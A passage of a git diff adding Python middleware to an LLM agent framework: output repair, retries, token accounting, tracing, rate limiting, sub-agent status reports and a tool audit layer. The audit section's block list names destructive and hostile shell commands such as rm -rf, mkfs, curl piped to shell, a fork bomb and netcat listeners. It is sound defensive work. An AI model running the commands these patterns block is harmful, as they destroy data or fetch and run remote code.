content using :func:`dataclasses.replace` so every +other ``LLMResponse`` field (tool_calls, reasoning_content, usage, …) is +preserved automatically. + +Phase 4 will move this module to ``components/middleware/llm/`` per the +final folder structure design; the current location keeps the import +graph simple for the V1 light SDK. + +Placement +--------- +Wired as the **last** entry in +``build_default_research_llm_middleware_chain``. ``LLMMiddlewareChain`` +runs ``after_llm`` hooks in *reverse* registration order (onion model), +so being last makes this middleware the innermost: it fires first in +``after_llm`` and every outer middleware (tracing, token accounting, +loop detection) sees the same canonical repaired content that the agent +loop / tool parser ultimately consume. +""" + +from __future__ import annotations + +import logging +import re +from dataclasses import replace +from typing import Any, cast + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.llm import LLMResponse + +logger = logging.getLogger(__name__) + +__all__ = ["OutputRepairMiddleware", "repair_output_text"] + + +# Match a closing tag followed by optional whitespace and another copy of +# the same closing tag. Iterated until the text stabilises so that runs +# of three or more collapse cleanly: ```` → one. +_DUP_CLOSE_RE = re.compile( + r"\s*", + flags=re.IGNORECASE, +) + +_OPEN_THINK_RE = re.compile(r"<(think|thinking)>", flags=re.IGNORECASE) +_CLOSE_THINK_RE = re.compile(r"", flags=re.IGNORECASE) + + +def repair_output_text(text: str) -> str: + """Apply the three repair rules to a single text segment. + + 1. Collapse consecutive ```` / ```` runs to one. + 2. If opens > closes, append a matching close at the end. + 3. Strip trailing whitespace. + + Returns the input unchanged when no rule matched — callers can use + identity comparison to detect a no-op. + """ + if not text: + return text + + # Hot-path early exit: most production LLMs (gpt-5 / gemini / claude) + # never emit thinking tags. Skip the dedup loop + two findall passes + # entirely when the text contains neither tag form, so the only work + # left is a trailing-whitespace check. + lowered = text.lower() + if "", repaired) + if new == repaired: + break + repaired = new + + opens = _OPEN_THINK_RE.findall(repaired) + closes = _CLOSE_THINK_RE.findall(repaired) + if len(opens) > len(closes): + # Match the *first* unclosed open's tag style so we don't mix + # ```` openers with ```` closers. + tag = opens[len(closes)].lower() + repaired = repaired + f"" + + return repaired.rstrip() + + +def _repair_content(content: Any) -> Any: + """Apply ``repair_output_text`` to an ``LLMResponse.content`` payload. + + Content is either ``str`` (OpenAI-style) or a list of dict / string + blocks (Anthropic-style). We repair text in each shape and forward + unknown block types untouched. + """ + if isinstance(content, str): + return repair_output_text(content) + + if isinstance(content, list): + repaired_blocks: list[Any] = [] + for block in cast("list[Any]", content): + text_value = ( + cast("dict[str, Any]", block).get("text") + if isinstance(block, dict) + else None + ) + if isinstance(text_value, str): + mapping = cast("dict[str, Any]", block) + new_text = repair_output_text(text_value) + if new_text == text_value: + repaired_blocks.append(mapping) + else: + repaired_blocks.append({**mapping, "text": new_text}) + elif isinstance(block, str): + repaired_blocks.append(repair_output_text(block)) + else: + repaired_blocks.append(block) + return repaired_blocks + + return content + + +class OutputRepairMiddleware(LLMMiddleware): + """Tail-end LLM middleware that fixes structural output noise. + + Rules (see ``repair_output_text``): + 1. Dedupe consecutive ```` / ```` tokens. + 2. Auto-close an unclosed ```` block. + 3. Trim trailing whitespace. + + Args: + enabled: ``False`` short-circuits ``after_llm`` to a pass-through. + Useful for benchmarks comparing raw vs repaired output. + """ + + def __init__(self, *, enabled: bool = True) -> None: + self._enabled = enabled + + @property + def name(self) -> str: + return "output_repair" + + @property + def enabled(self) -> bool: + return self._enabled + + async def after_llm( + self, ctx: LLMCallContext, response: LLMResponse, + ) -> LLMResponse: + repaired = _repair_content(response.content) + if repaired is response.content or repaired == response.content: + return response + + logger.debug( + "OutputRepairMiddleware: repaired output (task=%s, call=%d)", + ctx.task_id, ctx.call_index, + ) + return replace(response, content=repaired) diff --git a/agent_core/components/middleware/llm/retry.py b/agent_core/components/middleware/llm/retry.py new file mode 100644 index 0000000..c7ce776 --- /dev/null +++ b/agent_core/components/middleware/llm/retry.py @@ -0,0 +1,59 @@ +"""LLM retry middleware — exponential backoff for transient failures.""" + +from __future__ import annotations + +import asyncio +import logging + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.retry_policy import legacy_retryable + +logger = logging.getLogger(__name__) + + +class LLMRetryMiddleware(LLMMiddleware): + """Transparent retry for transient LLM failures (timeout, 429, 5xx). + + Plugs into the ``on_llm_error`` hook added to ``LLMProxy``. + When a call fails with a retryable error and the attempt count is + below ``max_retries``, this middleware sleeps (exponential back-off + with jitter) and returns ``True`` so the proxy re-issues the call. + """ + + def __init__( + self, + max_retries: int = 3, + backoff_base: float = 0.5, + backoff_max: float = 8.0, + ) -> None: + self._max_retries = max_retries + self._backoff_base = backoff_base + self._backoff_max = backoff_max + + @property + def name(self) -> str: + return "llm_retry" + + async def on_llm_error( + self, ctx: LLMCallContext, error: Exception, attempt: int, + ) -> bool: + if attempt >= self._max_retries: + return False + if not legacy_retryable(error): + return False + + import random + delay = min( + self._backoff_base * (2 ** attempt), self._backoff_max, + ) + random.random() * 0.25 + logger.warning( + "LLMRetryMiddleware: attempt %d/%d failed (%s), " + "retrying in %.1fs", + attempt + 1, self._max_retries, + type(error).__name__, delay, + ) + await asyncio.sleep(delay) + return True diff --git a/agent_core/components/middleware/llm/token_accounting.py b/agent_core/components/middleware/llm/token_accounting.py new file mode 100644 index 0000000..8ce44ee --- /dev/null +++ b/agent_core/components/middleware/llm/token_accounting.py @@ -0,0 +1,302 @@ +from __future__ import annotations + +import logging +from typing import Any, cast + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.execution_context import ( + get_current_execution_scope, +) +from agent_core.llm import LLMResponse +from agent_core.protocols import CostPersister, CostSink, EventSink + +logger = logging.getLogger(__name__) + + +class TokenAccountingMiddleware(LLMMiddleware): + """Tracks cumulative token usage per task and charges BudgetState. + + After each LLM call, extracts input/output token counts from response + metadata, accumulates them, charges the BudgetState, and optionally + emits SSE events for frontend display. + + Cost accounting flows through the injected ``CostSink``; callers that want + zero accounting pass ``cost_sink=None`` (or simply omit the kwarg). A host + typically injects a persistent tracker in its server runtime and an + in-memory or no-op one in its stateless SDK path. + + Durable persistence (``persist_cost``) is opt-in through the injected + ``CostPersister``; when ``None`` -- the default -- the method is a no-op. + Both seams are Protocols so that neither the cost schema nor the database + session handling has to be known here. + """ + + def __init__( + self, + event_store: EventSink | None = None, + *, + cost_sink: CostSink | None = None, + cost_persister: CostPersister | None = None, + scene: str = "", + usage_aggregator: Any = None, + ) -> None: + raw_cost_sink: object = cost_sink + if ( + cost_persister is not None + and cost_sink is not None + and not isinstance(raw_cost_sink, CostSink) + ): + raise TypeError( + "cost_sink must implement CostSink.record and CostSink.get_summary " + "when cost_persister is configured" + ) + self._event_store = event_store + # Per-task cumulative counters: task_id → {input, output, total, llm_calls} + self._usage: dict[str, dict[str, int]] = {} + # Per-task model tracking for cost estimation. ``cost_sink`` is + # injected by the composition root (bootstrap_runtime / SDK) + # rather than self-resolved through the registry; this keeps + # ``components/middleware/`` from importing ``state/`` directly + # (Phase 6 layering invariant). + self._cost_tracker: CostSink | None = cost_sink + # Where the final summary lands. A Protocol rather than a database + # session factory: the schema, the column names and the transaction + # boundary are host concerns, and holding a session factory here is + # what previously kept this class in the product. + self._cost_persister: CostPersister | None = cost_persister + self._primary_model: dict[str, str] = {} # task_id → model name + # Heavy-mode scene tag (e.g. "main_llm" / "dag_model" / + # "outline_llm" / "report_llm"). Empty → no scene wiring; + # ``usage_aggregator`` then never sees scene either, matching + # the existing single-bucket flow. + self._scene = scene + # Optional sink for the SDK ``UsageAggregator`` so the same LLM + # call can flow into both the per-task cost tracker (this class) + # and the protocol-level final.usage. Duck-typed to avoid an + # sdk_cli → components import. + self._usage_aggregator = usage_aggregator + + @property + def name(self) -> str: + return "token_accounting" + + def get_usage(self, task_id: str) -> dict[str, int]: + """Get cumulative usage for a task. Returns copy.""" + return dict(self._usage.get(task_id, {"input": 0, "output": 0, "total": 0, "llm_calls": 0})) + + def _extract_usage(self, response: LLMResponse) -> tuple[int, int, int, int]: + """Extract (input, output, cache_read, cache_creation) token counts. + + Native :class:`LLMResponse` carries a single flat ``usage`` dict in + OpenAI-wire shape regardless of provider — the infra clients + normalise both OpenAI (``prompt_tokens`` / ``completion_tokens`` / + ``prompt_tokens_details.cached_tokens``) and Anthropic + (``input_tokens`` / ``output_tokens`` / ``cache_read_input_tokens``) + into ``{prompt_tokens, completion_tokens, total_tokens, + cached_tokens}``. Cache-creation tokens are not surfaced by the + native clients, so that count is always 0. + """ + raw_usage: object = getattr(response, "usage", None) + if not isinstance(raw_usage, dict): + return 0, 0, 0, 0 + usage = cast("dict[str, Any]", raw_usage) + + inp = usage.get("prompt_tokens", usage.get("input_tokens", 0)) or 0 + out = usage.get("completion_tokens", usage.get("output_tokens", 0)) or 0 + cache_read = ( + usage.get("cached_tokens") + or usage.get("cache_read_input_tokens") + or 0 + ) + cache_create = usage.get("cache_creation_input_tokens", 0) or 0 + return int(inp), int(out), int(cache_read), int(cache_create) + + async def after_llm( + self, ctx: LLMCallContext, response: LLMResponse + ) -> LLMResponse: + input_tokens, output_tokens, cache_read, cache_create = self._extract_usage(response) + total = input_tokens + output_tokens + + if total == 0: + return response + + task_id = ctx.task_id or "unknown" + + # Accumulate + if task_id not in self._usage: + self._usage[task_id] = {"input": 0, "output": 0, "total": 0, "llm_calls": 0} + acc = self._usage[task_id] + acc["input"] += input_tokens + acc["output"] += output_tokens + acc["total"] += total + acc["llm_calls"] += 1 + + # Cost tracking + raw_rm: object = getattr(response, "response_metadata", None) + rm: dict[str, Any] = ( + cast("dict[str, Any]", raw_rm) if isinstance(raw_rm, dict) else {} + ) + # Prefer the provider-reported model carried on ``LLMResponse.model``; + # fall back to anything stamped in response_metadata, then to the + # model id we stashed in ctx.metadata (set by LLMProxy._make_ctx). + # Gateways like api.miromind.site often return an empty model. + model_name = ( + getattr(response, "model", "") + or rm.get("model_name") + or rm.get("model") + or ctx.metadata.get("model_id", "") + ) + # Vendor label stamped by a fallback chain. Empty when the LLM is + # constructed without a chain wrapper — caller can still bucket + # by model alone. + provider = str(rm.get("provider_actually_used") or "") + if model_name and task_id != "unknown" and self._cost_tracker is not None: + try: + self._cost_tracker.record( + task_id, model_name, input_tokens, output_tokens, + ) + self._primary_model.setdefault(task_id, model_name) + except Exception: + pass + + # Mirror this call into the SDK UsageAggregator (if injected) so + # heavy-mode aux LLMs (dag_model / outline_llm / report_llm) feed + # the same final.usage as the main agent. Duck-typed call; + # silently no-op on any signature mismatch. + # + # Cache fields use the 2026-05-28 split: pass both + # ``cache_read_tokens`` (was ``cached_tokens`` semantically) and + # ``cache_write_tokens`` (was ``cache_creation_tokens``). + # Older aggregator builds that only accept the legacy + # ``cached_tokens`` kwarg are handled via the cascading TypeError + # fallback below. + if self._usage_aggregator is not None and model_name: + try: + self._usage_aggregator.record_llm_call( + provider=provider, + model=model_name, + prompt_tokens=int(input_tokens), + completion_tokens=int(output_tokens), + cache_read_tokens=int(cache_read or 0), + cache_write_tokens=int(cache_create or 0), + scene=self._scene, + ) + except TypeError: + # Older aggregator API — try legacy kwarg only. + try: + self._usage_aggregator.record_llm_call( + provider=provider, + model=model_name, + prompt_tokens=int(input_tokens), + completion_tokens=int(output_tokens), + cached_tokens=int(cache_read or 0), + scene=self._scene, + ) + except TypeError: + # Even older — no provider / scene support. + # ``contextlib.suppress`` would read worse threaded into the + # middle of this cascade, which is being carried across + # unchanged on purpose — collapsing it is a behavior change + # that deserves its own review. + try: # noqa: SIM105 + self._usage_aggregator.record_llm_call( + model=model_name, + prompt_tokens=int(input_tokens), + completion_tokens=int(output_tokens), + cached_tokens=int(cache_read or 0), + ) + except Exception: + pass + except Exception: + pass + except Exception: + pass + + # Store in context metadata for downstream consumers + ctx.metadata["token_usage"] = { + "this_call": { + "input": input_tokens, + "output": output_tokens, + "total": total, + "cache_read": cache_read, + "cache_creation": cache_create, + }, + "cumulative": dict(acc), + "model": model_name, + } + + # Charge BudgetState if available in execution scope + try: + scope = get_current_execution_scope() + if scope and "budget_state" in scope.metadata: + from agent_core.models.task_budget import BudgetCharge + budget_state = scope.metadata["budget_state"] + budget_state.charge(BudgetCharge( + primitive="llm_call", + llm_calls=1, + tokens=total, + )) + except Exception: + pass # Budget charging is best-effort + + # Emit SSE event for frontend + if self._event_store and task_id != "unknown": + try: + from agent_core.events import EventType + await self._event_store.append( + task_id=task_id, + event_type=EventType.AGENT_ACTION, + payload={ + "trace_type": "token_usage", + "this_call": { + "input": input_tokens, + "output": output_tokens, + "cache_read": cache_read, + "cache_creation": cache_create, + }, + "cumulative": dict(acc), + "model": model_name, + }, + agent_role="system", + ) + except Exception: + pass # SSE emission is best-effort + + logger.debug( + "TokenAccounting task=%s: +%d tokens (cumulative: %d input, %d output, %d total)", + task_id, total, acc["input"], acc["output"], acc["total"], + ) + return response + + async def persist_cost(self, task_id: str) -> None: + """Hand the task's cumulative cost summary to the host. Call on completion. + + No-op when ``cost_sink`` or ``cost_persister`` is missing — the SDK / + stateless runtime path has nothing to persist into, and that is the + default rather than an error. + + Swallows persister failures on purpose: accounting is observability, and + a database that is down must not fail the task whose cost it describes. + The traceback is kept at debug level. + """ + if self._cost_tracker is None or self._cost_persister is None: + return + try: + await self._cost_persister.persist( + task_id, + self._cost_tracker.get_summary(task_id), + self._primary_model.get(task_id, ""), + ) + except Exception: + logger.debug("Failed to persist cost for task %s", task_id, exc_info=True) + + def reset(self, task_id: str) -> None: + """Clear counters for a task (e.g., after task completion).""" + self._usage.pop(task_id, None) + self._primary_model.pop(task_id, None) + reset = getattr(self._cost_tracker, "reset", None) + if reset is not None: + reset(task_id) diff --git a/agent_core/components/middleware/llm/tracing.py b/agent_core/components/middleware/llm/tracing.py new file mode 100644 index 0000000..5a022d6 --- /dev/null +++ b/agent_core/components/middleware/llm/tracing.py @@ -0,0 +1,92 @@ +from __future__ import annotations + +import logging +import time +from typing import Any, cast + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.llm import LLMResponse +from agent_core.messages import Message, text_of + +logger = logging.getLogger(__name__) +_START_TIME_KEY = "_llm_tracing_start_monotonic" + + +class LLMTracingMiddleware(LLMMiddleware): + """Records duration and message counts for every LLM call.""" + + def __init__(self, trace_logger: Any = None) -> None: + self._trace = trace_logger + + @property + def name(self) -> str: + return "llm_tracing" + + async def before_llm( + self, ctx: LLMCallContext, messages: list[Message] + ) -> list[Message]: + # Keep call-local state on the call context. If chat ultimately raises, + # the context and timer are released together without a separate error + # hook or middleware-owned cleanup table. + ctx.metadata[_START_TIME_KEY] = time.monotonic() + return messages + + async def after_llm( + self, ctx: LLMCallContext, response: LLMResponse + ) -> LLMResponse: + raw_start = ctx.metadata.pop(_START_TIME_KEY, None) + # Use duration from metadata (stream) if available, otherwise calculate + duration_ms = ctx.metadata.get("duration_ms") + if duration_ms is None: + start = raw_start if isinstance(raw_start, float) else time.monotonic() + duration_ms = int((time.monotonic() - start) * 1000) + + if self._trace: + try: + # Native LLMResponse carries a flat ``usage`` dict; the + # response_metadata is a thin ``{"id": ...}`` map. + raw_rm: object = getattr(response, "response_metadata", None) + rm: dict[str, Any] = ( + cast("dict[str, Any]", raw_rm) + if isinstance(raw_rm, dict) + else {} + ) + raw_usage: object = getattr(response, "usage", None) + usage: Any = raw_usage or rm.get("token_usage") or rm.get("usage") or {} + + metadata = { + "role_id": ctx.role_id, + "call_index": ctx.call_index, + "duration_ms": duration_ms, + "usage": usage, + } + # A fallback chain stamps these on the response when the + # call fell through to a secondary model. Surface them in + # the trace metadata so observability can flag failover + # runs without a separate IPC channel — master design §5.9. + if "fallback_used" in rm: + metadata["fallback_used"] = rm["fallback_used"] + if "model_actually_used" in rm: + metadata["model_actually_used"] = rm["model_actually_used"] + if ctx.metadata.get("correlation_id"): + metadata["correlation_id"] = ctx.metadata["correlation_id"] + + output_text = text_of(response.content) + await self._trace.log_llm_call( + task_id=ctx.task_id or "unknown", + agent_role_id=ctx.role_id, + action=f"llm_call:{ctx.call_index}", + input_preview="[LLM Request]", + output_preview=output_text[:4000] if output_text else "", + duration_ms=duration_ms, + session_id=ctx.metadata.get("session_id"), + prompt_id=ctx.metadata.get("prompt_id"), + step_id=ctx.metadata.get("step_id"), + metadata=metadata, + ) + except Exception: + logger.debug("LLMTracingMiddleware.after_llm logging failed", exc_info=True) + return response diff --git a/agent_core/components/middleware/rate_limit.py b/agent_core/components/middleware/rate_limit.py new file mode 100644 index 0000000..f007f64 --- /dev/null +++ b/agent_core/components/middleware/rate_limit.py @@ -0,0 +1,178 @@ +"""RateLimitMiddleware — LLM-layer token bucket rate limiter. + +Issue #24 Phase C: prevents parallel agents from overwhelming API quotas. + +Uses a simple token bucket algorithm with per-provider limits. +Queues on limit (asyncio.sleep), never rejects. +after_llm corrects estimates with actual token usage. +""" + +from __future__ import annotations + +import asyncio +import logging +import time + +from agent_core.components.middleware.llm.base import LLMCallContext, LLMMiddleware +from agent_core.llm import LLMResponse +from agent_core.messages import Message, text_of + +logger = logging.getLogger(__name__) + + +class TokenBucket: + """Simple token bucket rate limiter. + + Tracks two resources: requests per minute and tokens per minute. + Refills continuously based on elapsed time. + """ + + def __init__( + self, + requests_per_min: int = 60, + tokens_per_min: int = 100_000, + ) -> None: + if requests_per_min <= 0: + raise ValueError("requests_per_min must be positive") + if tokens_per_min <= 0: + raise ValueError("tokens_per_min must be positive") + self._rpm = float(requests_per_min) + self._tpm = float(tokens_per_min) + + # Buckets start full + self._request_tokens = self._rpm + self._token_tokens = self._tpm + self._last_refill = time.monotonic() + self._lock = asyncio.Lock() + + def _refill(self) -> None: + """Refill buckets based on elapsed time.""" + now = time.monotonic() + elapsed_min = (now - self._last_refill) / 60.0 + self._request_tokens = min( + self._rpm, + self._request_tokens + elapsed_min * self._rpm, + ) + self._token_tokens = min( + self._tpm, + self._token_tokens + elapsed_min * self._tpm, + ) + self._last_refill = now + + async def acquire(self, estimated_tokens: int = 0) -> float: + """Acquire rate limit capacity. Returns wait time in seconds. + + If bucket is empty, calculates required wait time and sleeps. + Returns the time spent waiting (0 if no wait was needed). + """ + total_wait = 0.0 + # A single request cannot reserve more than a full minute's token + # capacity. Capping avoids an infinite wait for an oversized prompt; + # the provider remains the authority on whether that request is valid. + requested_tokens = min(max(estimated_tokens, 0), int(self._tpm)) + + while True: + async with self._lock: + self._refill() + + req_wait = 0.0 + if self._request_tokens < 1.0: + deficit = 1.0 - self._request_tokens + req_wait = (deficit / self._rpm) * 60.0 + + tok_wait = 0.0 + if requested_tokens > 0 and self._token_tokens < requested_tokens: + deficit = requested_tokens - self._token_tokens + tok_wait = (deficit / self._tpm) * 60.0 + + wait_time = max(req_wait, tok_wait) + if wait_time <= 0: + # Capacity is checked and reserved in one critical section; + # no other waiter can consume the refill between them. + self._request_tokens -= 1.0 + if requested_tokens > 0: + self._token_tokens -= requested_tokens + return total_wait + + logger.info( + "RateLimit: queuing %.1fs (req_wait=%.1f, tok_wait=%.1f)", + wait_time, req_wait, tok_wait, + ) + await asyncio.sleep(wait_time) + total_wait += wait_time + + def adjust(self, actual_tokens: int, estimated_tokens: int) -> None: + """Correct token bucket with actual usage. + + If we over-estimated, give back the difference. + If under-estimated, consume the difference. + """ + diff = estimated_tokens - actual_tokens + if diff != 0: + self._token_tokens = min( + self._tpm, self._token_tokens + diff, + ) + + +class RateLimitMiddleware(LLMMiddleware): + """LLM middleware: token bucket rate limiter. + + Prevents parallel agents from overwhelming LLM API quotas. + Queues requests when limits are hit — never rejects. + """ + + def __init__( + self, + requests_per_min: int = 60, + tokens_per_min: int = 100_000, + ) -> None: + self._bucket = TokenBucket(requests_per_min, tokens_per_min) + self._estimate_key = "_rate_limit_estimated_tokens" + + @property + def name(self) -> str: + return "rate_limit" + + async def before_llm( + self, + ctx: LLMCallContext, + messages: list[Message], + ) -> list[Message]: + """Acquire rate limit capacity before LLM call.""" + # Rough estimate: ~4 chars per token + estimated = sum( + len(str(text_of(m.get("content")))) for m in messages + ) // 4 + ctx.metadata[self._estimate_key] = estimated + + wait = await self._bucket.acquire(estimated) + if wait > 0: + ctx.metadata["rate_limit_wait_s"] = round(wait, 2) + + return messages + + async def after_llm( + self, + ctx: LLMCallContext, + response: LLMResponse, + ) -> LLMResponse: + """Correct token bucket with actual usage from response.""" + usage = ( + response.usage + or response.response_metadata.get("token_usage") + or response.response_metadata.get("usage") + or {} + ) + actual_total = ( + usage.get("total_tokens") + or usage.get("prompt_tokens", 0) + + usage.get("completion_tokens", 0) + or usage.get("input_tokens", 0) + + usage.get("output_tokens", 0) + ) + estimated = ctx.metadata.get(self._estimate_key, 0) + + if actual_total and estimated: + self._bucket.adjust(actual_total, estimated) + + return response diff --git a/agent_core/components/middleware/status_report.py b/agent_core/components/middleware/status_report.py new file mode 100644 index 0000000..cc22410 --- /dev/null +++ b/agent_core/components/middleware/status_report.py @@ -0,0 +1,110 @@ +"""StatusReportMiddleware — phase-level heartbeat for sub-agents. + +Issue #24 Phase D: sub-agents report progress at phase boundaries +(not per-LLM-call, to avoid event flooding in react_solve's 50+ turns). + +Only fires when execution_context contains parent_agent_id, +indicating this is a sub-agent spawned by AgentBus. +""" + +from __future__ import annotations + +import logging +import time +from collections.abc import Callable, Mapping +from typing import Any + +from agent_core.protocols import ExecutionMiddleware, PhaseContext + +logger = logging.getLogger(__name__) + +PhaseResultSummarizer = Callable[[Mapping[str, Any]], Mapping[str, Any]] + + +class StatusReportMiddleware(ExecutionMiddleware): + """Emits phase-level status reports from sub-agents to their parent. + + Uses AgentComm with QUEUE delivery (parent polls when ready). + Only active for sub-agent tasks (parent_agent_id in execution_context). + """ + + def __init__( + self, + result_summarizer: PhaseResultSummarizer | None = None, + ) -> None: + """Create a status reporter. + + ``result_summarizer`` is host-owned: it may add domain-specific fields + to the message content without teaching AgentCore about a workflow's + result schema. + """ + self._result_summarizer = result_summarizer + + async def before_phase(self, ctx: PhaseContext) -> PhaseContext: + """Record phase start time.""" + ctx.metadata["_status_phase_start"] = time.monotonic() + return ctx + + async def after_phase( + self, ctx: PhaseContext, result: dict[str, Any], + ) -> dict[str, Any]: + """Send status report to parent agent after phase completion.""" + parent_id = ctx.metadata.get("parent_agent_id") + if not parent_id: + # Not a sub-agent — skip + return result + + try: + from agent_core.components.agent_bus.agent_comm import ( + AgentComm, + DeliveryMode, + ) + from agent_core.models.agent_message import AgentMessage + from agent_core.runtime.registries import services as registry + + agent_comm = registry.get_optional(AgentComm) + if agent_comm is None: + return result + + start = ctx.metadata.get( + "_status_phase_start", time.monotonic(), + ) + duration_ms = int((time.monotonic() - start) * 1000) + + details: dict[str, Any] = {} + if self._result_summarizer is not None: + try: + details.update(self._result_summarizer(result)) + except Exception: + logger.debug( + "StatusReport result summarizer failed", + exc_info=True, + ) + + report = AgentMessage( + task_id=ctx.task_id, + from_agent=ctx.role_id or "unknown", + to_agent=parent_id, + message_type="status_report", + content={ + **details, + "agent_id": ctx.role_id, + "task_id": ctx.task_id, + "phase": ctx.phase_id, + "status": "phase_completed", + "duration_ms": duration_ms, + }, + ) + await agent_comm.send(report, mode=DeliveryMode.QUEUE) + logger.debug( + "StatusReport: %s completed phase '%s' → parent %s", + ctx.role_id, ctx.phase_id, parent_id, + ) + except Exception as e: + # Never fail the pipeline for a status report + logger.debug("StatusReportMiddleware failed: %s", e) + + return result + + +__all__ = ["PhaseResultSummarizer", "StatusReportMiddleware"] diff --git a/agent_core/components/middleware/todo.py b/agent_core/components/middleware/todo.py new file mode 100644 index 0000000..7c542fe --- /dev/null +++ b/agent_core/components/middleware/todo.py @@ -0,0 +1,175 @@ +"""TodoMiddleware — re-injects task progress after context compaction. + +Issue #25 Phase B: prevents long-running tasks from losing their plan +when SummarizationMiddleware compresses the conversation. + +Runs AFTER SummarizationMiddleware in the LLM middleware chain. +Detects when context was compacted and injects a compact task progress +reminder from PlanSnapshot + WorkingMemory. +""" + +from __future__ import annotations + +import logging + +from agent_core.components.middleware.llm.base import LLMCallContext, LLMMiddleware +from agent_core.messages import Message, text_of, user_msg + +logger = logging.getLogger(__name__) + +# Minimum turn count before injecting (avoid noise on early turns) +_MIN_TURN_FOR_INJECTION = 3 + +# Injection marker so we don't double-inject +_TODO_MARKER = "[Task Progress]" + + +class TodoMiddleware(LLMMiddleware): + """LLM middleware: inject task progress after context compaction. + + Detects compacted context (summary message present) and injects a + compact task progress block derived from PlanSnapshot/WorkingMemory. + + This ensures the LLM always knows: + - What sub-questions are still open + - What has been found so far (evidence count, key findings) + - What the current budget status is + - What the recommended next action is + """ + + @property + def name(self) -> str: + return "todo" + + async def before_llm( + self, + ctx: LLMCallContext, + messages: list[Message], + ) -> list[Message]: + """Inject compact task progress when context is compacted or deep.""" + if not self._should_inject(ctx, messages): + return messages + + progress_block = self._build_progress_block(ctx) + if not progress_block: + return messages + + # Inject as a user message before the last user message + # so the LLM sees it as recent context + todo_msg = user_msg(progress_block) + + # Find insertion point: before the last non-system message + insert_idx = len(messages) + for i in range(len(messages) - 1, -1, -1): + if messages[i].get("role") != "system": + insert_idx = i + break + + result = list(messages) + result.insert(insert_idx, todo_msg) + logger.debug( + "TodoMiddleware: injected progress block (%d chars) " + "at position %d", + len(progress_block), insert_idx, + ) + return result + + def _should_inject( + self, + ctx: LLMCallContext, + messages: list[Message], + ) -> bool: + """Decide whether to inject task progress.""" + # Don't inject if already present + for m in messages: + content = str(text_of(m.get("content"))) + if _TODO_MARKER in content: + return False + + # Always inject if context was compacted (summary present) + for m in messages: + content = str(text_of(m.get("content"))) + if "[Previous conversation summary" in content: + return True + + # Also inject on high turn counts even without compaction + turn = ctx.metadata.get("turn", 0) + return turn >= _MIN_TURN_FOR_INJECTION + + def _build_progress_block(self, ctx: LLMCallContext) -> str: + """Build compact task progress from PlanSnapshot + WorkingMemory.""" + parts = [_TODO_MARKER] + + # 1. Working Memory summary (findings + evidence count) + wm_summary = self._get_wm_summary() + if wm_summary: + parts.append(wm_summary) + + # 2. PlanSnapshot: open sub-questions + budget + snapshot_summary = self._get_snapshot_summary(ctx) + if snapshot_summary: + parts.append(snapshot_summary) + + # 3. Evaluation guidance (if available in metadata) + guidance = ctx.metadata.get("continuation_guidance", "") + if guidance: + parts.append(f"Suggested focus: {guidance}") + + # Only return if we have substantive content + if len(parts) <= 1: + return "" + return "\n".join(parts) + + def _get_wm_summary(self) -> str: + """Extract compact summary from WorkingMemory. + + Domain subclasses can override ``one_line_summary`` to surface their + own progress vocabulary without coupling this middleware to it. + """ + try: + from agent_core.components.memory import ( + current_working_memory, + ) + + wm = current_working_memory.get(None) + if wm is None: + return "" + + lines: list[str] = [wm.one_line_summary()] + if wm.key_findings: + lines.append("Key findings:") + for f in wm.key_findings[-5:]: + lines.append(f" - {f[:100]}") + return "\n".join(lines) + except Exception: + return "" + + def _get_snapshot_summary(self, ctx: LLMCallContext) -> str: + """Extract compact summary from execution context.""" + try: + from agent_core.execution_context import ( + get_current_execution_scope, + ) + + scope = get_current_execution_scope() + if scope is None: + return "" + + # Build from scope metadata if available + meta = scope.metadata or {} + lines: list[str] = [] + + # Turn progress + turn = ctx.metadata.get("turn", 0) + max_turns = meta.get("max_turns", 0) + if max_turns: + lines.append(f"Turn: {turn}/{max_turns}") + + # Budget + depth = meta.get("current_depth", 0) + if depth > 0: + lines.append(f"Sub-agent depth: {depth}") + + return "\n".join(lines) + except Exception: + return "" diff --git a/agent_core/components/middleware/tool_audit.py b/agent_core/components/middleware/tool_audit.py new file mode 100644 index 0000000..c49cf4e --- /dev/null +++ b/agent_core/components/middleware/tool_audit.py @@ -0,0 +1,204 @@ +"""ToolAuditMiddleware — tool-layer security audit and risk classification. + +Issue #24 Phase C: audits all tool calls, blocks high-risk bash commands, +warns on suspicious web_fetch targets. + +Risk levels: +- block: tool call is prevented, error returned to LLM +- warn: tool call proceeds but logged at WARNING level +- pass: normal execution +""" + +from __future__ import annotations + +import logging +import re +from collections.abc import Callable +from typing import Any, Literal + +from agent_core.protocols import ExecutionMiddleware, ToolCallContext + +logger = logging.getLogger(__name__) + +RiskLevel = Literal["block", "warn", "pass"] +BashClassifier = Callable[[str], tuple[RiskLevel, str]] + +# ── Bash high-risk patterns ───────────────────────────────────────────── + +_BASH_BLOCK_PATTERNS: list[tuple[re.Pattern[str], str]] = [ + (re.compile(r"\brm\b[^\n]*(?:--no-preserve-root)"), "rm --no-preserve-root"), + (re.compile(r"\brm\s+(-[rf]+\s+)?/"), "rm on root path"), + (re.compile(r"\brm\s+-rf\b"), "rm -rf"), + (re.compile(r"\bmkfs\b"), "mkfs (format disk)"), + (re.compile(r"\bdd\s+.*of=/dev/"), "dd to device"), + (re.compile(r"curl\s.*\|\s*(ba)?sh"), "curl pipe to shell"), + (re.compile(r"wget\s.*\|\s*(ba)?sh"), "wget pipe to shell"), + (re.compile(r"\b:\(\)\s*\{.*\|.*&\s*\}\s*;"), "fork bomb"), + (re.compile(r"\bchmod\s+777\s+/"), "chmod 777 on root"), + (re.compile(r"\bsudo\s+rm\b"), "sudo rm"), + (re.compile(r">\s*/etc/"), "overwrite /etc/"), + (re.compile(r"\bshutdown\b|\breboot\b|\bhalt\b"), "system shutdown"), +] + +_BASH_WARN_PATTERNS: list[tuple[re.Pattern[str], str]] = [ + (re.compile(r"\bsudo\b"), "sudo usage"), + (re.compile(r"\bchmod\b"), "chmod usage"), + (re.compile(r"\bchown\b"), "chown usage"), + (re.compile(r"\bkill\s+-9\b"), "kill -9"), + (re.compile(r"\bnc\s+-l"), "netcat listener"), + (re.compile(r"\biptables\b"), "iptables modification"), +] + + +class ToolAuditMiddleware(ExecutionMiddleware): + """Tool-layer middleware: audit + risk classification. + + - bash: regex-based command classification (block/warn/pass) + - web_fetch: domain awareness (warn on unusual patterns) + 